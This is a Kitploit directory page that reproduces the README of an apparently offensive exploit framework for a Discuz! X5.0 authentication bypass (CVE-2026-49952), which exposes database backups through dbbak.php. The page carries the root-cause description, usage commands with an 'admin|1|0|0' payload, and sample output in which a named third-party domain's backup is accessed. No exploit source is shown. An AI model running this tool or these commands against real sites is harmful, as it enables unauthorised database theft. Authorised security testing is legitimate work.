Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Discuz-X5.0-Authentication-Bypass-Exploit-Framework — Discuz! X5.0 Authentication Bypass Exploit Framework (CVE-2026-49952) - Critical vulnerability allowing unauthenticated database backup access via UC_KEY encryption oracle token reuse. CVSS 9.1. Full-featured tool with version detection, multi-payload attacks, interactive shell, and automated exploitation. Authorized testing only. | Kitploit
Tools/GitHubGitHub/cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework
Authentication & AuthorizationExploit FrameworksVulnerability AnalysisWeb Application ExploitationInformation GatheringPenetration TestingDatabase Security
GitHub

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →

About

cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework

Discuz-X5.0-Authentication-Bypass-Exploit-Framework

View Repository
1152 months agoNot yet reviewed

Discuz! X5.0 Authentication Bypass Exploit Framework (CVE-2026-49952) - Critical vulnerability allowing unauthenticated database backup access via UC_KEY encryption oracle token reuse. CVSS 9.1. Full-featured tool with version detection, multi-payload attacks, interactive shell, and automated exploitation. Authorized testing only.

Share

Discuz! X5.0 Authentication Bypass Exploit Framework

Security CVE CVSS Python License Version

⚡ CVE-2026-49952 | CVSS 9.1 (Critical ) | Version 1.0.0

A professional penetration testing tool designed to identify and demonstrate the critical authentication bypass vulnerability in Discuz! X5.0.

D1

📋 Table of Contents

  • ⚠️ Disclaimer

  • 🔍 Overview

  • 🎯 Vulnerability Details

  • ✨ Features

  • 📦 Installation

  • 🚀 Quick Start

  • 💻 Usage Examples

  • 🖥️ Interactive Shell

  • 🛡️ Security Considerations

  • 🔧 Troubleshooting

  • 📄 License


⚠️ Disclaimer

IMPORTANT NOTICEThis tool is provided for educational purposes and authorized security testing only.DO NOT use this tool on systems you do not own or lack explicit permission to test.Unauthorized access to computer systems is illegal and unethical.The author assumes no responsibility for any misuse or damage caused by this tool.By using this tool, you agree to comply with all applicable laws and regulations.


🔍 Overview

Discuz! X5.0 Authentication Bypass Exploit Framework is designed to identify and demonstrate the critical authentication bypass vulnerability (CVE-2026-49952) in Discuz! X5.0 versions released between March 20, 2026, and May 1, 2026.

This vulnerability allows unauthenticated attackers to access the database backup functionality (dbbak.php) by exploiting the UC_KEY encryption oracle for token reuse, potentially exposing sensitive database contents.

Key Highlights

  • 🏆 CVSS Score: 9.1 (Critical)

  • 🔐 Impact: Authentication Bypass

  • 📂 Access: Database Backup Files

  • ⚡ Complexity: Low (Easy to Exploit)

  • 🎯 Target: Discuz! X5.0 (20260320 - 20260501)


🎯 Vulnerability Details

Technical Summary

AttributeDetails
Vulnerability TypeAuthentication Bypass
CVE IDCVE-2026-49952
CVSS Version3.1
CVSS Score9.1 (Critical)
Attack VectorNetwork
Attack ComplexityLow
Privileges RequiredNone
User InteractionNone
Confidentiality ImpactHigh
Integrity ImpactHigh
Availability ImpactHigh
Exploit Code MaturityFunctional
Remediation LevelOfficial Fix Available

Root Cause

The vulnerability exists in the dbbak.php endpoint where the token validation mechanism relies on the UC_KEY encryption oracle. By crafting a specific payload in the login request (member.php), an attacker can obtain a valid authentication token that can be reused to access the database backup functionality without proper authorization.

Affected Versions

  • ❌ Discuz! X5.0 (20260320 - 20260501) - Vulnerable

  • ✅ Discuz! X5.0 (20260510+) - Fixed


✨ Features

Core Features

  • 🔍 Version Detection: Automatic fingerprinting and Discuz! version identification.

  • ⚡ Multi-Payload Attack: Parallel testing of multiple payload variants.

  • 🖥️ Interactive Shell: Full-featured command-line interface for manual exploitation.

  • 🚀 Automated Exploitation: One-click exploitation with minimal configuration.

  • 📊 Result Saving: Export exploitation results to timestamped files.

  • 🌐 Proxy Support: HTTP/HTTPS proxy configuration for network traversal.

  • 🎯 Threaded Scanning: Configurable thread count for performance optimization.

  • 🎨 Color Output: Professional color-coded terminal output.

Advanced Features

  • 🔐 SSL/TLS Support: Handles both HTTP and HTTPS targets.

  • 🔄 Session Management: Maintains persistent session state.

  • 📦 Payload Customization: Support for custom payload injection.

  • 🎯 Target Validation: Verifies Discuz! installation before exploitation.


📦 Installation

Prerequisites

  • Python: Version 3.7 or higher

  • Pip: Python package manager

Install from Source

# Clone the repository
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework

# Install required packages
pip install -r requirements.txt

# Verify installation
python3 exploit.py --help

Install with Docker

# Build the Docker image
docker build -t exploit .

# Run the container
docker run -it --rm exploit http://target.com

🚀 Quick Start

Basic Usage

# Simple exploitation
python3 exploit.py http://target.com

# With output file
python3 exploit.py http://target.com --output results.txt

# Verbose mode for debugging
python3 exploit.py http://target.com --verbose

Advanced Usage

# With proxy and custom threads
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10

# Custom payload
python3 exploit.py http://target.com --payload "admin|1|0|0"

💻 Usage Examples

Example 1: Basic Exploitation

python3 exploit.py http://discuz.eda.com.my
📤 Expected Output
██████╗ ██╗███████╗██╗   ██╗███████╗███████╗██████╗ 
██╔══██╗██║██╔════╝██║   ██║╚══███╔╝╚══███╔╝╚════██╗
██║  ██║██║███████╗██║   ██║  ███╔╝  ███╔╝  █████╔╝
██║  ██║██║╚════██║██║   ██║ ███╔╝  ███╔╝  ██╔═══╝ 
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝

Discuz! X5.0 Authentication Bypass Exploit Framework
CVE-2026-49952 | CVSS: 9.1 (Critical )
Author: Sudeepa Wanigarathna | Version: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[14:32:15] ► Phase 1: Target Reconnaissance
[14:32:15] ➜ Testing connectivity to http://discuz.eda.com.my
[14:32:16] ➜ Detecting Discuz! version...
[14:32:16] ✔ Discuz! Version: X5.0
[14:32:16] ⚡ Target is running a vulnerable version!
[14:32:16] ► Phase 2: Authcode Acquisition
[14:32:16] ➜ Extracting authcode with payload: admin|1|0|0
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► Phase 3: Exploitation
[14:32:17] ➜ Executing exploit (operation: backup )
[14:32:18] ✔ Exploit successful!
[14:32:18] ✔ Results saved to discuz_exploit_20260724_143218.txt

╔══════════════════════════════════════════════════════════╗
║  EXPLOIT SUCCESSFUL                                      ║
╠══════════════════════════════════════════════════════════╣
║  Target: http://discuz.eda.com.my                        ║
║  Authcode: aBcDeFgHiJkLmNoPqRsT...                       ║
║  Status: Database backup accessed                        ║
║  Data Size: 24567 bytes                                  ║
║  Saved to: discuz_exploit_20260724_143218.txt            ║
╚══════════════════════════════════════════════════════════╝

🖥️ Interactive Shell

Start the interactive shell for manual exploitation:

python3 discuz_exploit.py http://target.com --interactive

Available Commands

Download Tool